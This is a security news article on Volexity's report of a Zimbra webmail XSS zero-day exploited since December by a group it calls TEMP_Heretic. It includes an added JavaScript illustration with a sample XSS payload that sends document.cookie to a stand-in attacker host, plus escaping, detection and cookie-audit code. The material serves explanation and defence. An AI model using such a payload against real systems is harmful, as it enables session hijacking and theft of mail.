Targeted attacks on zero-day vulnerability in Zimbra


According to the security company Volexity, attackers have been exploiting a security hole in the Zimbra collaboration software since December. The manufacturer was informed in December, but has not yet delivered a patch or other protective measures.

The vulnerability is a cross-site scripting (XSS) flaw. The attack typically works like this: the victim receives an email containing a link. If the recipient opens that link in a browser in which they are already logged into Zimbra in another window or tab, the attack succeeds. Because of the XSS bug, script code supplied by the attacker ends up executing in the context of the Zimbra web client, with the victim's session.

The mail itself can be opened in any client, including a desktop program such as Thunderbird; what matters is that the attacker's page and an authenticated Zimbra session are active in the same browser. In the observed attacks, the attackers used this primarily to read emails and their attachments. In principle, however, the same access could also be used to send emails in the victim's name or to steal cookies that grant persistent access to the Zimbra account, Volexity explains in its analysis.
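To make the attack class concrete, here is an added example (not Zimbra code and not Volexity's proof of concept; the page template, the parameter name, the exfiltration host `attacker.invalid` and the cookie name `auth_token` are all constructed for illustration). It shows a page that interpolates a URL parameter unescaped next to the same page with escaping, the kind of payload an attacker's link would carry, and a check of the cookie attributes that limit what script-accessible cookies are worth:

```javascript
// Added illustration of reflected XSS in a webmail-style page and of a cookie
// hardening check. Not Zimbra code, not Volexity's PoC: template, parameter,
// host and cookie name below are constructed for the example.

// Minimal HTML escaper for text placed into an element body or quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: a request parameter is interpolated into the page unescaped, so
// whatever markup the attacker put into the link runs with the victim's session.
function renderUnsafe(folderName) {
  return `<h2>Folder: ${folderName}</h2>`;
}

// Hardened: same page, same parameter, value escaped before interpolation.
function renderSafe(folderName) {
  return `<h2>Folder: ${escapeHtml(folderName)}</h2>`;
}

// Constructed payload of the kind an attacker's link would carry: an element
// whose event handler sends document.cookie to an attacker-controlled host.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.invalid/c?\'+document.cookie)">';

// Detects markup a browser would execute (script tags, inline event handlers,
// javascript: URLs). A sanity check for test output, not a substitute for escaping.
function containsActiveMarkup(html) {
  return /<script\b/i.test(html)
    || /<\w+[^>]*\son\w+\s*=/i.test(html)
    || /javascript:/i.test(html);
}

// Audits one Set-Cookie header for the attributes that limit what a stolen or
// script-readable session cookie is worth. Returns the missing attributes.
function auditSetCookie(setCookieHeader) {
  const attrs = setCookieHeader.split(';').slice(1).map((a) => a.trim().toLowerCase());
  const has = (name) => attrs.some((a) => a === name || a.startsWith(name + '='));
  const missing = [];
  if (!has('httponly')) missing.push('HttpOnly'); // blocks document.cookie reads
  if (!has('secure')) missing.push('Secure');     // cookie only sent over HTTPS
  if (!has('samesite')) missing.push('SameSite'); // limits cross-site sends
  return missing;
}

// Demo run with the constructed inputs.
console.log('unsafe:', renderUnsafe(SAMPLE_PAYLOAD));
console.log('safe:  ', renderSafe(SAMPLE_PAYLOAD));
console.log('missing on constructed cookie:',
  auditSetCookie('auth_token=abc123; Path=/; Secure'));
```

Note the limit of the cookie check: HttpOnly stops the injected script from reading document.cookie, but script running inside the victim's origin can still read mail and issue requests with the session, which is exactly the abuse Volexity describes. Cookie flags narrow the damage; only removing the XSS flaw removes the attack.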

Since December 14, Volexity has been observing highly targeted attacks via this vulnerability, which it attributes to a group it calls TEMP_Heretic. Volexity says it informed Zimbra on December 16, including a demo exploit that illustrates the problem. Nevertheless, there is neither a security update nor even an advisory from Zimbra. Volexity has now published its findings.

The parallels to a critical vulnerability in Microsoft Exchange, with which Zimbra competes, are striking. There, too, Volexity had informed the vendor in December about targeted attacks on a zero-day vulnerability; Microsoft did not close it until March. By then the vulnerability was being exploited en masse, and most Exchange servers were caught unprepared. Zimbra is nowhere near as widespread as Exchange, and an XSS flaw is not as severe as the Exchange vulnerabilities, but the current situation is still worrying.

If you want to protect your Zimbra server, you do not have many options at the moment. According to Volexity, Zimbra version 8.8.15 is affected, while the still fairly new 9.0.0 appears not to be. A version upgrade could therefore take the server out of the line of fire. Furthermore, Volexity describes the attacks in detail in its report "Operation EmailThief: Active Exploitation of Zero-day XSS Vulnerability in Zimbra" and provides Indicators of Compromise that can be used to detect or prepare for attacks by TEMP_Heretic. The catch is that these indicators are tied to one group and become useless as soon as other attackers discover and exploit the vulnerability.

It would be better if the vendor developed specific protective measures and published them in its security center. At the time of publication of this article, however, the only statement there is that Zimbra is not affected by Log4j.

